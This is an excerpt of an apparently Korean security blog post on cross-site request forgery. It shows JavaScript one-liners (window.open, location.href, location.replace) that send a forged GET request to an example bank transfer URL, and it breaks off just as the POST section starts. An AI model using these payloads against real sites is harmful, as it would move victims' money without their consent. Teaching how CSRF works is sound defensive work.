CSRF : Silently submitting a forged POST request ▶ Submitting a forged POST request GET방식이면 간단히 다음과 같이 img태그나 a태그의 링크에 get방식으로 파라미터를 넣으면 된다. 1 2 3 4 5 6 7 8 9 10 11 12 // html태그 사용 Click here! // javascript 태그 사용 /* 새 창 띄우기 */ window.open('http://bank.com/sendmoney?to=guest&amount=1337'); /* 현재 창 주소 옮기기 */ location.href = 'http://bank.com/sendmoney?to=guest&amount=1337'; location.replace('http://bank.com/sendmoney?to=guest&amount=1337'); cs PO.. 2022. 11. 30. 이전 1 다음
